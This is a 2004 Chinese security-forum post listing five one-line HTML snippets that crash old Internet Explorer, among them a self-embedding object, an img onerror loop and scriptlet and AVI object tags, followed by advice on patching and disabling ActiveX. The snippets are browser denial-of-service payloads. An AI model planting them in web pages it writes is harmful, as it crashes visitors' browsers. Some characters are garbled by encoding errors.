|
 | 作者: NetPolaris [newmyth21]
 论坛用户 |
登录 |
| 一行代码崩溃IE 微软产品素以Bug众多著称,其中Windows系统和IE浏览器更是Bug多多。对于IE浏览器,甚至简单的一行代码就能使它崩溃。所谓IE崩溃,就是所有的IE浏览器窗口关闭,乃至引起系统出错、死机等。在网页中嵌入以下几种代码就能引起IE崩溃。 1.object对象链接和嵌入元素循环调用能导致IE崩溃: <!- 此代码所在的文件名应为crash.htm --> <object data=″crash.htm″ type=″text/html″></object> 2.包含恶意image标签的html页面能导致系统进程的无限循环,从而引起IE崩溃。对Windows9X操作系统,还会引起系统不稳定: <img src=″::″ &#111nError=″this.src=::;″> 对于这个Bug微软已经提供了补丁,如果你的系统打了这个补丁的话,你会看到一个弹出警告窗口: Stack overflow at line��x(在某行栈溢出)。 3.包含恶意AVI Object的html页面能引起IE崩溃: <object classid=″clsid��00022613-0000-0000-C000-000000000046″></object> 4.一个包含特殊object对象内容的html页面将导致DoS攻击,引起IE崩溃: <object data=″#″ type=″text/x-scriptlet″></object> 5.畸形的input标签导致IE崩溃: <input type> 上面罗列的只是一些简单的代码,但能让IE崩溃的恶意代码又何止这些,IE的漏洞也不仅仅是崩溃,严重的漏洞能让心怀恶意者对用户的电脑为所欲为。IE作为绝大多数网民使用的浏览器,加强它的安全性势在必然,如及时打补丁、安装杀毒软件(可查杀一些恶意代码)、不访问不可靠的网站、提高浏览器的安全级别(如禁用ActiveX、禁止脚本、阻止Cookie)等。 |
| 地主 发表时间: 04-02-05 05:10 |
| 回复: NetPolaris [newmyth21] 论坛用户 |
登录 |
很菜吧,自已顶一下了 |
| B1层 发表时间: 04-02-05 07:45 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 一行代码崩溃IE